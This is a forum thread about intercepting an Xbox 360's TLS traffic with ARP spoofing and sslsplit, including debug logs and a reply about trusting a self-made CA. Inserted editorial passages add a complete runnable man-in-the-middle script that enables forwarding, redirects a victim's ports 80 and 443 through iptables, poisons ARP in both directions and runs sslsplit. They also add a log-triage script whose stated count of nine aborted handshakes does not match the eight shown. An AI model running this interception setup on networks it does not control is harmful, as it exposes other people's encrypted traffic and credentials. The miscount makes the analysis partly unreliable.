precursor Posted March 15, 2015

I'm attempting to sniff my Xbox 360's traffic and see the cleartext data sent over HTTPS+SSL. My Xbox 360's local IP address is 192.168.0.22. My attacker Arch Linux box's address is 192.168.0.18. I have installed dsniff and SSLsplit on the attacker box and am performing an ARP cache poisoning attack using the following commands simultaneously in two terminal windows:

arpspoof -i enp0s25 -t 192.168.0.1 192.168.0.22
arpspoof -i enp0s25 -t 192.168.0.22 192.168.0.1

I created a fake certificate using the following commands:

openssl genrsa -out ca.key 4096
openssl req -new -x509 -days 1826 -key ca.key -out ca.crt

I am running sslsplit like this:

sslsplit -D -l connections.log -j /var/log/sslsplit/ -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

When I log in to XBL on the 360, I see non-SSL traffic over port 80 in the logs, but the SSL traffic over port 443 has log files with nothing in them (size=0KB). My guess is there is a problem with my certificate: it's not able to verify that it has been signed by a Root CA. Do you know of a way to fix this issue? If that's not the issue, what is and how can I fix it? Thanks for your help.
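The post lists the arpspoof, openssl and sslsplit commands but not the two pieces that sit between them: IP forwarding on the attacker box, and the netfilter REDIRECT rules that steer the victim's port 80/443 flows into sslsplit's listeners (sslsplit's "netfilter" NAT engine, which the debug banner shows as the default here, only ever sees traffic that iptables has redirected to its 8080/8443 ports). The script below is an added example, not the poster's setup; it assumes the interface, gateway and victim addresses from the thread as defaults, treats the REDIRECT rules and the `-subj`/`-extensions v3_ca` options on the CA request as the editor's choices rather than anything the post shows, and prints every command as a dry run unless `DRY_RUN=0` is set.

```shell
#!/bin/sh
# Complete lab setup for the ARP-spoof + sslsplit interception described in the
# post: IP forwarding, netfilter REDIRECT rules that feed the victim's 80/443
# flows into sslsplit's "netfilter" NAT engine listeners, CA generation, and the
# two arpspoof directions.  Added example, not the poster's script.  Interface,
# gateway and victim addresses default to the values given in the thread.
# DRY_RUN=1 (the default) only prints the commands; DRY_RUN=0 executes them and
# needs root.  Use only on a network you own or are authorised to test.

IFACE=${IFACE:-enp0s25}
GATEWAY=${GATEWAY:-192.168.0.1}
VICTIM=${VICTIM:-192.168.0.22}
DRY_RUN=${DRY_RUN:-1}

run() { if [ "$DRY_RUN" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi; }
bg()  { if [ "$DRY_RUN" = 1 ]; then printf '%s &\n' "$*"; else "$@" & fi; }

# Emit the NAT rules as text so they can be reviewed, applied, or reversed.
# Matching on the victim's source address keeps the attacker's own traffic
# out of the proxy.  Ports 8080/8443 must match sslsplit's proxyspecs.
redirect_rules() {
    iface=$1; victim=$2
    printf 'iptables -t nat -A PREROUTING -i %s -s %s -p tcp --dport 80 -j REDIRECT --to-ports 8080\n' "$iface" "$victim"
    printf 'iptables -t nat -A PREROUTING -i %s -s %s -p tcp --dport 443 -j REDIRECT --to-ports 8443\n' "$iface" "$victim"
}

apply_rules()  { redirect_rules "$IFACE" "$VICTIM" | while IFS= read -r r; do run $r; done; }
# Reversal: the same rules with -A swapped for -D.
remove_rules() { redirect_rules "$IFACE" "$VICTIM" | sed 's/ -A / -D /' | while IFS= read -r r; do run $r; done; }

# Self-signed CA.  -extensions v3_ca asks for the CA:TRUE basicConstraints
# explicitly instead of relying on whatever the local openssl.cnf defaults to.
make_ca() {
    [ -f ca.key ] || run openssl genrsa -out ca.key 4096
    [ -f ca.crt ] || run openssl req -new -x509 -days 1826 -key ca.key -out ca.crt \
                         -subj '/CN=sslsplit lab CA' -extensions v3_ca
}

setup() {
    run sysctl -w net.ipv4.ip_forward=1
    apply_rules
    make_ca
    # Both directions at once, as the poster did with two terminals.
    bg arpspoof -i "$IFACE" -t "$GATEWAY" "$VICTIM"
    bg arpspoof -i "$IFACE" -t "$VICTIM" "$GATEWAY"
    run mkdir -p /var/log/sslsplit logdir
    run sslsplit -D -l connections.log -j /var/log/sslsplit/ -S logdir/ -k ca.key -c ca.crt \
        ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
}

teardown() {
    run pkill arpspoof
    remove_rules
    run sysctl -w net.ipv4.ip_forward=0
}

case "${1:-setup}" in
    setup)    setup ;;
    teardown) teardown ;;
    *) echo "usage: $0 [setup|teardown]" >&2; exit 2 ;;
esac
```

Run it once with the default dry run to read the exact commands, then `DRY_RUN=0 sh mitm-lab.sh setup` as root and `DRY_RUN=0 sh mitm-lab.sh teardown` afterwards so the NAT rules and forwarding do not outlive the experiment. Whether the Xbox accepts the forged leaf is a separate question that the setup cannot influence; the debug output further down is where that is answered.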
precursor (Author) Posted March 15, 2015

I forgot to post the debug output from sslsplit:

Generated RSA key for leaf certs.
SSLsplit 0.4.9 (built 2015-03-10)
Copyright (c) 2009-2014, Daniel Roethlisberger <daniel@roe.ch>
http://www.roe.ch/SSLsplit
Build info: V:FILE
Features: -DHAVE_NETFILTER
NAT engines: netfilter* tproxy
netfilter: IP_TRANSPARENT SOL_IPV6 !IPV6_ORIGINAL_DST
compiled against OpenSSL 1.0.2 22 Jan 2015 (1000200f)
rtlinked against OpenSSL 1.0.2 22 Jan 2015 (1000200f)
TLS Server Name Indication (SNI) supported
OpenSSL is thread-safe with THREADID
Using SSL_MODE_RELEASE_BUFFERS
SSL/TLS algorithm availability: RSA DSA ECDSA DH ECDH EC
OpenSSL option availability: SSL_OP_NO_COMPRESSION SSL_OP_NO_TICKET SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION SSL_OP_TLS_ROLLBACK_BUG
compiled against libevent 2.0.22-stable
rtlinked against libevent 2.0.22-stable
2 CPU cores detected
proxyspecs:
- [0.0.0.0]:8080 tcp plain netfilter
- [0.0.0.0]:8443 ssl plain netfilter
Loaded CA: '/C=US/ST=UT/O=Internet Widgits Pty Ltd/CN=Someone'
Using libevent backend 'epoll'
Event base supports: edge yes, O(1) yes, anyfd no
Inserted events:
  0x12054b0 [fd 7] Read Persist
  0x1208740 [fd 8] Read Persist
  0x12088f0 [fd 9] Read Persist
  0x12052e8 [fd 6] Read Persist
  0x1208980 [fd 3] Signal Persist
  0x1208bc0 [fd 1] Signal Persist
  0x1208cf0 [fd 2] Signal Persist
  0x1208e20 [fd 13] Signal Persist
Initialized 4 connection handling threads
Started 4 connection handling threads
Starting main event loop.
Connecting to [199.117.103.168]:80
tcp [192.168.0.22]:19970 [199.117.103.168]:80
SNI peek: [n/a] [complete]
Connecting to [134.170.178.197]:443
===> Original server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 69:c6:f2:83:ee:0a:16:3b:fd:a6:df:f7:21:c9:97:0a:6d:7d:65:91
Certificate cache: MISS
===> Forged server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 16:64:58:97:e4:90:80:7d:84:77:67:bd:f2:93:c6:f2:ea:d6:68:d4
ssl [192.168.0.22]:5808 [134.170.178.197]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com
Unclean SSL shutdown.
SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
Garbage collecting caches started.
Garbage collecting caches done.
SNI peek: [n/a] [complete]
Connecting to [134.170.178.64]:443
===> Original server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 69:c6:f2:83:ee:0a:16:3b:fd:a6:df:f7:21:c9:97:0a:6d:7d:65:91
Certificate cache: HIT
===> Forged server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 16:64:58:97:e4:90:80:7d:84:77:67:bd:f2:93:c6:f2:ea:d6:68:d4
ssl [192.168.0.22]:48310 [134.170.178.64]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com
Unclean SSL shutdown.
SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
SNI peek: [n/a] [complete]
Connecting to [65.55.42.33]:443
SNI peek: [n/a] [complete]
Connecting to [65.55.42.33]:443
SNI peek: [n/a] [complete]
Connecting to [157.56.70.154]:443
===> Original server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 1d:53:37:af:7a:4d:b6:c9:ff:4d:39:35:f7:bb:06:64:58:54:36:bb
Certificate cache: MISS
===> Forged server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 4b:fb:b2:96:45:b8:fc:66:32:10:ab:36:21:13:c3:34:4a:5e:52:9c
ssl [192.168.0.22]:32910 [65.55.42.33]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com
Unclean SSL shutdown.
SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
SNI peek: [n/a] [complete]
Attempt reuse dst SSL session
Connecting to [134.170.178.197]:443
===> Original server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 1d:53:37:af:7a:4d:b6:c9:ff:4d:39:35:f7:bb:06:64:58:54:36:bb
Certificate cache: HIT
===> Forged server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 4b:fb:b2:96:45:b8:fc:66:32:10:ab:36:21:13:c3:34:4a:5e:52:9c
ssl [192.168.0.22]:29356 [65.55.42.33]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com
===> Original server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 1d:53:37:af:7a:4d:b6:c9:ff:4d:39:35:f7:bb:06:64:58:54:36:bb
Certificate cache: HIT
===> Forged server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 4b:fb:b2:96:45:b8:fc:66:32:10:ab:36:21:13:c3:34:4a:5e:52:9c
ssl [192.168.0.22]:28325 [157.56.70.154]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com
===> Original server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 69:c6:f2:83:ee:0a:16:3b:fd:a6:df:f7:21:c9:97:0a:6d:7d:65:91
Certificate cache: HIT
===> Forged server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 16:64:58:97:e4:90:80:7d:84:77:67:bd:f2:93:c6:f2:ea:d6:68:d4
ssl [192.168.0.22]:25598 [134.170.178.197]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com
Unclean SSL shutdown.
SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
Unclean SSL shutdown.
SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
Unclean SSL shutdown.
SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
SNI peek: [n/a] [complete]
Connecting to [172.230.192.227]:443
SNI peek: [n/a] [complete]
Attempt reuse dst SSL session
Connecting to [65.55.42.33]:443
===> Original server certificate:
Subject DN: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/OU=Xbox/CN=*.xbox.com
Common Names: *.xbox.com/*.xbox.com
Fingerprint: fa:36:ff:8e:70:87:3d:52:3b:65:23:43:65:63:36:5e:4f:24:a6:eb
Certificate cache: MISS
===> Forged server certificate:
Subject DN: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/OU=Xbox/CN=*.xbox.com
Common Names: *.xbox.com/*.xbox.com
Fingerprint: 44:4c:08:75:ea:66:05:74:ff:37:de:d0:15:2e:bb:c2:26:e3:12:76
ssl [192.168.0.22]:10291 [172.230.192.227]:443 sni:- crt:*.xbox.com/*.xbox.com origcrt:*.xbox.com/*.xbox.com
===> Original server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 1d:53:37:af:7a:4d:b6:c9:ff:4d:39:35:f7:bb:06:64:58:54:36:bb
Certificate cache: HIT
===> Forged server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 4b:fb:b2:96:45:b8:fc:66:32:10:ab:36:21:13:c3:34:4a:5e:52:9c
ssl [192.168.0.22]:57485 [65.55.42.33]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com
Unclean SSL shutdown.
SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
Unclean SSL shutdown.
SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
SSL_free() in state 00000003 = 0003 = SSLOK (SSL negotiation finished successfully) [connect socket]
Garbage collecting caches started.
Garbage collecting caches done.
^CReceived signal 2
Main event loop stopped.
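A quick way to read a debug log like the one above, as an added example that is not part of the original post: the lines that matter are the `SSL_free() in state ... [accept socket]` lines. `[accept socket]` is the victim-facing leg, and state `SSL_ST_ACCEPT ... read client key exchange A` means sslsplit had already sent its ServerHello, the forged certificate and ServerHelloDone and was waiting for the client's ClientKeyExchange when the client closed the connection. A client that hangs up at exactly that point is the signature of a client rejecting the certificate it was shown; the single `SSLOK ... [connect socket]` line only says the upstream leg to the real xboxlive.com server completed, which has nothing to do with whether the console trusts the forged leaf. The sample lines embedded below are an excerpt of the debug output posted above, trimmed to a few connections; the counting and verdict logic are the editor's, written in POSIX sh and awk so they run on the attacker box without anything beyond the base system.

```shell
#!/bin/sh
# Summarise an `sslsplit -D` debug log: how many connections were split, which
# original/forged certificate pairs the victim was shown, and how many of the
# victim-facing TLS handshakes ended in the "waiting for ClientKeyExchange"
# state (client hung up right after seeing the forged certificate) versus
# completing.  Added example; the sample lines are excerpted from the thread.

SAMPLE_LOG=$(cat <<'EOF'
Connecting to [134.170.178.197]:443
===> Original server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 69:c6:f2:83:ee:0a:16:3b:fd:a6:df:f7:21:c9:97:0a:6d:7d:65:91
Certificate cache: MISS
===> Forged server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 16:64:58:97:e4:90:80:7d:84:77:67:bd:f2:93:c6:f2:ea:d6:68:d4
ssl [192.168.0.22]:5808 [134.170.178.197]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com
Unclean SSL shutdown.
SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
SNI peek: [n/a] [complete]
Connecting to [172.230.192.227]:443
===> Original server certificate:
Subject DN: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/OU=Xbox/CN=*.xbox.com
Common Names: *.xbox.com/*.xbox.com
Fingerprint: fa:36:ff:8e:70:87:3d:52:3b:65:23:43:65:63:36:5e:4f:24:a6:eb
Certificate cache: MISS
===> Forged server certificate:
Subject DN: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/OU=Xbox/CN=*.xbox.com
Common Names: *.xbox.com/*.xbox.com
Fingerprint: 44:4c:08:75:ea:66:05:74:ff:37:de:d0:15:2e:bb:c2:26:e3:12:76
ssl [192.168.0.22]:10291 [172.230.192.227]:443 sni:- crt:*.xbox.com/*.xbox.com origcrt:*.xbox.com/*.xbox.com
Unclean SSL shutdown.
SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
SSL_free() in state 00000003 = 0003 = SSLOK (SSL negotiation finished successfully) [connect socket]
EOF
)

# Count split connections and classify how each TLS leg was torn down.
# Output: splits=N client_aborted_in_handshake=N client_ok=N server_ok=N
summarize_handshakes() {
    awk '
        /^ssl \[/ { splits++ }
        /^SSL_free\(\) in state/ && /\[accept socket\]/  && /SSL_ST_ACCEPT/ { client_abort++ }
        /^SSL_free\(\) in state/ && /\[accept socket\]/  && /SSLOK/        { client_ok++ }
        /^SSL_free\(\) in state/ && /\[connect socket\]/ && /SSLOK/        { server_ok++ }
        END { printf "splits=%d client_aborted_in_handshake=%d client_ok=%d server_ok=%d\n",
                     splits, client_abort, client_ok, server_ok }'
}

# One line per distinct (CN, original fingerprint, forged fingerprint) triple,
# i.e. what the real server presented versus what the victim actually saw.
cert_pairs() {
    awk '
        /^===> Original server certificate/ { side = "orig" }
        /^===> Forged server certificate/   { side = "forged" }
        /^Common Names: / && side == "orig" { cn = $3 }
        /^Fingerprint: / {
            if (side == "orig") { ofp = $2 }
            else if (side == "forged") {
                key = cn " orig=" ofp " forged=" $2
                if (!(key in seen)) { seen[key] = 1; print key }
                side = ""
            }
        }'
}

# Turn the counts into a one-line reading of the client behaviour.
verdict() {
    summary=$(summarize_handshakes)
    aborted=${summary#*client_aborted_in_handshake=}; aborted=${aborted%% *}
    ok=${summary#*client_ok=}; ok=${ok%% *}
    if [ "$aborted" -gt 0 ] && [ "$ok" -eq 0 ]; then
        echo "verdict: victim closed every handshake right after the forged leaf was sent; consistent with it rejecting the certificate (CA not trusted, or the real cert is pinned)"
    elif [ "$ok" -gt 0 ]; then
        echo "verdict: $ok client handshake(s) completed; the forged certificate was accepted at least once"
    else
        echo "verdict: no client-side SSL_free lines found"
    fi
}

# Usage: sslsplit -D ... 2>&1 | tee debug.log ; sh sslsplit-triage.sh debug.log
# With no argument the embedded sample is analysed.
input=${1:-}
if [ -n "$input" ]; then
    summarize_handshakes < "$input"; cert_pairs < "$input"; verdict < "$input"
else
    printf '%s\n' "$SAMPLE_LOG" | summarize_handshakes
    printf '%s\n' "$SAMPLE_LOG" | cert_pairs
    printf '%s\n' "$SAMPLE_LOG" | verdict
fi
```

Run against the full log above it reports nine client-side handshakes torn down in the ClientKeyExchange-wait state and none completed, which is why the per-connection content logs under `-S logdir/` stay at 0 bytes: no application data was ever exchanged on the victim leg, so there was nothing to write. That also makes the poster's own diagnosis (the console cannot verify the forged chain against a CA it trusts) the first thing to rule in or out before touching the proxy configuration.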
cooper Posted March 15, 2015

My guess would be, set up an https webserver that uses that generated cert. Browse to that site from the X-Box. It should complain about the unverified cert and ask you what to do about it. With any luck, there will be an option there to trust the cert which would add it to the xbox's truststore. From that point on you stand a chance that it'll accept the machine as one from the xboxlive.com domain. But don't be surprised when it still doesn't work. I wouldn't be at all amazed if the xbox has a preset list of certs for its game servers which are kept separately from the regular certs.